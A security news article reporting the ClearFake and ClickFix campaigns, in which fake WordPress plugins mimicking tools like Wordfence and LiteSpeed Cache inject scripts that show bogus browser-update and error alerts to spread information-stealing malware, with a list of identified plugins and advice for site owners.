A new wave of cyberattacks is targeting WordPress sites, installing malicious plugins that push information-stealing malware through fake software updates and error messages.

This campaign, known as ClearFake since 2023, is responsible for displaying fraudulent browser update banners on compromised websites. In 2024, a similar attack called ClickFix emerged, which mimics software error messages and suggests fake “fixes” that execute PowerShell scripts to install malware.

Recent reports indicate that over 6,000 WordPress sites have been breached by threat actors deploying these malicious plugins. The compromised plugins display alerts pretending to be from Google Chrome, Facebook, Google Meet, and even CAPTCHA pages, tricking users into executing malware.

GoDaddy security researcher Denis Sinegubko reported that these plugins are designed to look like legitimate tools, often mimicking well-known plugins such as Wordfence Security and LiteSpeed Cache. However, they embed harmful JavaScript scripts that inject malware into the site’s HTML code. The malicious scripts attempt to load additional JavaScript files from external sources like Binance Smart Chain (BSC), which then deliver the ClearFake or ClickFix payloads to display the deceptive banners.

Buy Me a Coffee

The following malicious plugins have been identified between June and September 2024:

  • LiteSpeed Cache Classic
  • Wordfence Security Classic
  • MonsterInsights Classic
  • SEO Booster Pro
  • Rank Booster Pro
  • Google SEO Enhancer
  • Universal Popup Plugin (among others)

Threat actors use stolen admin credentials to log in automatically to the WordPress site, bypassing the usual login process. The breach likely stems from brute-force attacks, phishing, or prior information-stealing malware campaigns.

READ
French Hospital Data Breach Exposes 750,000 Patients' Medical Records

If you notice fake alerts on your WordPress site, immediately review your installed plugins. Remove any that you do not recognize or did not install yourself. Reset your admin passwords and ensure that they are unique and secure. This proactive measure is essential in preventing further exploitation.